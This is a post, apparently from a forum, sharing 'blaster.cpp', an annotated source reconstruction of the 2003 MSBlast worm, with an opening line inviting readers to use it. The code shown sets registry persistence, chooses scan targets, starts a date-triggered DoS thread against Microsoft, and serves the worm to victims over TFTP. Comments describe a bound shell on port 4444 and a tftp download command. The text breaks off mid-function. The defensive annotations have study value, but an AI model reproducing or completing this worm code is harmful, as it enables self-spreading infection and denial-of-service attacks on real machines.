blaster.cpp

这是我前天终于编好的,谢谢大家,请适用

#include <winsock2.h>
#include <ws2tcpip.h> /*IP_HDRINCL*/
#include <wininet.h> /*InternetGetConnectedState*/
#include <stdio.h>

#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "wininet.lib")
#pragma comment (lib, "advapi32.lib")


/*
* These strings aren't used in the worm, Buford put them here
* so that whitehat researchers would discover them.
* BUFORD: Note that both of these messages are the typical
* behavior of a teenager who recently discovered love, and
* is in the normal teenage mode of challenging authority.
*/
const char msg1[]="I just want to say LOVE YOU SAN!!";
const char msg2[]="billy gates why do you make this possible ?"
" Stop making money and fix your software!!";


/*
* Buford probably put the worm name as a "define" at the top
* of his program so that he could change the name at any time.
* 2003-09-29: This is the string that Parson changed.
*/
#define MSBLAST_EXE "msblast.exe"

/*
* MS-RPC/DCOM runs over port 135.
* DEFENSE: firewalling port 135 will prevent systems from
* being exploited and will hinder the spread of this worm.
*/
#define MSRCP_PORT_135 135

/*
* The TFTP protocol is defined to run on port 69. Once this
* worm breaks into a victim, it will command it to download
* the worm via TFTP. Therefore, the worms briefly runs a
* TFTP service to deliver that file.
* DEFENSE: firewalling 69/udp will prevent the worm from
* fully infected a host.
*/
#define TFTP_PORT_69 69

/*
* The shell-prompt is established over port 4444. The 
* exploit code (in the variable 'sc') commands the victim
* to "bind a shell" on this port. The exploit then connects
* to that port to send commands, such as TFTPing the 
* msblast.exe file down and launching it.
* DEFENSE: firewalling 4444/tcp will prevent the worm from
* spreading.
*/
#define SHELL_PORT_4444 4444


/*
* A simple string to hold the current IP address
*/
char target_ip_string[16];

/*
* A global variable to hold the socket for the TFTP service.
*/
int fd_tftp_service;

/* 
* Global flag to indicate this thread is running. This
* is set when the thread starts, then is cleared when
* the thread is about to end.
* This demonstrates that Buford isn't confident with
* multi-threaded programming -- he should just check
* the thread handle.
*/
int is_tftp_running;

/* 
* When delivering the worm file to the victim, it gets the
* name by querying itself using GetModuleFilename(). This
* makes it easier to change the filename or to launch the
* worm. */
char msblast_filename[256+4];

int ClassD, ClassC, ClassB, ClassA;

int local_class_a, local_class_b;

int winxp1_or_win2k2;


ULONG WINAPI blaster_DoS_thread(LPVOID);
void blaster_spreader();
void blaster_exploit_target(int fd, const char *victim_ip);
void blaster_send_syn_packet(int target_ip, int fd);


/*************************************************************** 
* This is where the 'msblast.exe' program starts running
***************************************************************/
void main(int argc, char *argv[]) 
{ 
WSADATA WSAData; 
char myhostname[512]; 
char daystring[3];
char monthstring[3]; 
HKEY hKey;
int ThreadId;
register unsigned long scan_local=0; 

/*
* Create a registry key that will cause this worm
* to run every time the system restarts.
* DEFENSE: Slammer was "memory-resident" and could
* be cleaned by simply rebooting the machine.
* Cleaning this worm requires this registry entry
* to be deleted.
*/
RegCreateKeyEx(
/*hKey*/ HKEY_LOCAL_MACHINE, 
/*lpSubKey*/ "SOFTWARE\\Microsoft\\Windows\\"
"CurrentVersion\\Run",
/*Reserved*/ 0,
/*lpClass*/ NULL,
/*dwOptions*/ REG_OPTION_NON_VOLATILE,
/*samDesired */ KEY_ALL_ACCESS,
/*lpSecurityAttributes*/ NULL, 
/*phkResult */ &hKey,
/*lpdwDisposition */ 0);
RegSetValueExA(
hKey, 
"windows auto update", 
0, 
REG_SZ, 
MSBLAST_EXE, 
50);
RegCloseKey(hKey); 


/*
* Make sure this isn't a second infection. A common problem
* with worms is that they sometimes re-infect the same
* victim repeatedly, eventually crashing it. A crashed 
* system cannot spread the worm. Therefore, worm writers
* now make sure to prevent reinfections. The way Blaster
* does this is by creating a system "global" object called
* "BILLY". If another program in the computer has already
* created "BILLY", then this instance won't run.
* DEFENSE: this implies that you can remove Blaster by 
* creating a mutex named "BILLY". When the computer 
* restarts, Blaster will falsely believe that it has
* already infected the system and will quit. 
*/
CreateMutexA(NULL, TRUE, "BILLY"); 
if (GetLastError() == ERROR_ALREADY_EXISTS)
ExitProcess(0); 

/*
* Windows systems requires "WinSock" (the network API layer)
* to be initialized. Note that the SYNflood attack requires
* raw sockets to be initialized, which only works in
* version 2.2 of WinSock.
* BUFORD: The following initialization is needlessly
* complicated, and is typical of programmers who are unsure
* of their knowledge of sockets..
*/
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0
&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0
&& WSAStartup(1, &WSAData) != 0)
return;

/*
* The worm needs to read itself from the disk when 
* transferring to the victim. Rather than using a hard-coded
* location, it discovered the location of itself dynamically
* through this function call. This has the side effect of
* making it easier to change the name of the worm, as well
* as making it easier to launch it.
*/
GetModuleFileNameA(NULL, msblast_filename,
sizeof(msblast_filename)); 

/*
* When the worm infects a dialup machine, every time the user
* restarts their machine, the worm's network communication
* will cause annoying 'dial' popups for the user. This will
* make them suspect their machine is infected.
* The function call below makes sure that the worm only
* starts running once the connection to the Internet
* has been established and not before.
* BUFORD: I think Buford tested out his code on a machine
* and discovered this problem. Even though much of the
* code indicates he didn't spend much time on
* testing his worm, this line indicates that he did
* at least a little bit of testing.
*/
while (!InternetGetConnectedState(&ThreadId, 0))
Sleep (20000); /*wait 20 seconds and try again */

/*
* Initialize the low-order byte of target IP address to 0.
*/
ClassD = 0;

/*
* The worm must make decisions "randomly": each worm must
* choose different systems to infect. In order to make
* random choices, the programmer must "seed" the random
* number generator. The typical way to do this is by
* seeding it with the current timestamp.
* BUFORD: Later in this code you'll find that Buford calls
* 'srand()' many times to reseed. This is largely
* unnecessary, and again indicates that Buford is not 
* confident in his programming skills, so he constantly
* reseeds the generator in order to make extra sure he
* has gotten it right.
*/
srand(GetTickCount()); 

/*
* This initializes the "local" network to some random
* value. The code below will attempt to figure out what
* the true local network is -- but just in case it fails,
* the initialization fails, using random values makes sure
* the worm won't do something stupid, such as scan the
* network around 0.0.0.0
*/
local_class_a = (rand() % 254)+1; 
local_class_b = (rand() % 254)+1; 

/*
* This discovers the local IP address used currently by this
* victim machine. Blaster randomly chooses to either infect
* just the local ClassB network, or some other network,
* therefore it needs to know the local network.
* BUFORD: The worm writer uses a complex way to print out
* the IP address into a string, then parse it back again
* to a number. This demonstrates that Buford is fairly
* new to C programming: he thinks in terms of the printed
* representation of the IP address rather than in its
* binary form.
*/
if (gethostname(myhostname, sizeof(myhostname)) != -1) {
HOSTENT *p_hostent = gethostbyname(myhostname);

if (p_hostent != NULL && p_hostent->h_addr != NULL) {
struct in_addr in; 
const char *p_addr_item;

memcpy(&in, p_hostent->h_addr, sizeof(in));
sprintf(myhostname, "%s", inet_ntoa(in)); 

p_addr_item = strtok(myhostname, ".");
ClassA = atoi(p_addr_item); 

p_addr_item = strtok(0, ".");
ClassB = atoi(p_addr_item);

p_addr_item = strtok(0, ".");
ClassC = atoi(p_addr_item);

if (ClassC > 20) { 
/* When starting from victim's address range, 
* try to start a little bit behind. This is
* important because the scanning logic only
* move forward. */
srand(GetTickCount()); 
ClassC -= (rand() % 20); 
} 
local_class_a = ClassA; 
local_class_b = ClassB; 
scan_local = TRUE; 
}
}


/*
* This chooses whether Blaster will scan just the local
* network (40% chance) or a random network (60% chance)
*/
srand(GetTickCount()); 
if ((rand() % 20) < 12) 
scan_local = FALSE;

/*
* The known exploits require the hacker to indicate whether 
* the victim is WinXP or Win2k. The worm has to guess. The
* way it guesses is that it chooses randomly. 80% of the time
* it will assume that all victims are WinXP, and 20% of the
* time it will assume all victims are Win2k. This means that
* propogation among Win2k machines will be slowed down by
* the fact Win2k machines are getting DoSed faster than they
* are getting exploited. 
*/
winxp1_or_win2k2 = 1; 
if ((rand()%10) > 7) 
winxp1_or_win2k2 = 2; 

/*
* If not scanning locally, then choose a random IP address
* to start with.
* BUG: this worm choose bad ranges above 224. This will 
* cause a bunch of unnecessary multicast traffic. Weird
* multicast traffic has historically been an easy way of 
* detecting worm activity.
*/
if (!scan_local) { 
ClassA = (rand() % 254)+1; 
ClassB = (rand() % 254); 
ClassC = (rand() % 254); 
}


/*
* Check the date so that when in the certain range, it will 
* trigger a DoS attack against Micosoft. The following
* times will trigger the DoS attack:
* Aug 16 through Aug 31
* Spt 16 through Spt 30
* Oct 16 through Oct 31
* Nov 16 through Nov 30
* Dec 16 through Dec 31
* This applies to all years, and is based on local time.
* FAQ: The worm is based on "local", not "global" time.
* That means the DoS attack will start from Japan,
* then Asia, then Europe, then the United States as the
* time moves across the globe.
*/
#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT)
#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT)
GetDateFormat( LOCALE_409, 
0, 
NULL, /*localtime, not GMT*/ 
"d", 
daystring, 
sizeof(daystring)); 
GetDateFormat( LOCALE_409, 
0, 
NULL, /*localtime, not GMT*/ 
"M", 
monthstring, 
sizeof(monthstring));
if (atoi(daystring) > 15 && atoi(monthstring) > 8)
CreateThread(NULL, 0, 
blaster_DoS_thread, 
0, 0, &ThreadId); 

/*
* As the final task of the program, go into worm mode
* trying to infect systems.
*/
for (;;)
blaster_spreader();

/*
* It'll never reach this point, but in theory, you need a
* WSACleanup() after a WSAStartup().
*/
WSACleanup();
} 



/*
* This will be called from CreateThread in the main worm body
* right after it connects to port 4444. After the thread is 
* started, it then sends the string "
* tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents
* the IP address of the attacker).
* Once it sends the string, it then waits for 20 seconds for the
* TFTP server to end. If the TFTP server doesn't end, it calls
* TerminateThread.
*/
DWORD WINAPI blaster_tftp_thread(LPVOID p)
{
/*
* This is the protocol format of a TFTP packet. This isn't
* used in the code -- I just provide it here for reference
*/
struct TFTP_Packet
{
short opcode;
short block_id;
char data[512];
};

char reqbuf[512]; /* request packet buffer */
struct sockaddr_in server; /* server-side port number */
struct sockaddr_in client; /* client IP address and port */
int sizeof_client; /* size of the client structure*/
char rspbuf[512]; /* response packet */

static int fd; /* the socket for the server*/
register FILE *fp;
register block_id;
register int block_size;

/* Set a flag indicating this thread is running. The other 
* thread will check this for 20 seconds to see if the TFTP
* service is still alive. If this thread is still alive in
* 20 seconds, it will be killed.
*/
is_tftp_running = TRUE; /*1 == TRUE*/

/* Create a server-socket to listen for UDP requests on */
fd = socket(AF_INET, SOCK_DGRAM, 0);
if (fd == SOCKET_ERROR)
goto closesocket_and_exit;

/* Bind the socket to 69/udp */
memset(&server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(TFTP_PORT_69); 
server.sin_addr.s_addr = 0; /*TFTP server addr = <any>*/
if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0)
goto closesocket_and_exit;

/* Receive a packet, any packet. The contents of the received
* packet are ignored. This means, BTW, that a defensive 
* "worm-kill" could send a packet from somewhere else. This
* will cause the TFTP server to download the msblast.exe
* file to the wrong location, preventing the victim from
* doing the download. */
sizeof_client = sizeof(client);
if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0, 
(struct sockaddr*)&client, &sizeof_client) <= 0)
goto closesocket_and_exit;

/* The TFTP server will respond with many 512 byte blocks
* until it has completely sent the file; each block must
* have a unique ID, and each block must be acknowledged.
* BUFORD: The worm ignores TFTP ACKs. This is probably why
* the worm restarts the TFTP service rather than leaving it
* enabled: it essentially flushes all the ACKs from the 
* the incoming packet queue. If the ACKs aren't flushed,
* the worm will incorrectly treat them as TFTP requests.
*/
block_id = 0;

/* Open this file. GetModuleFilename was used to figure out
* this filename. */
fp = fopen(msblast_filename, "rb");
if (fp == NULL)
goto closesocket_and_exit;

/* Continue sending file fragments until none are left */
for (;;) {
block_id++;

/* Build TFTP header */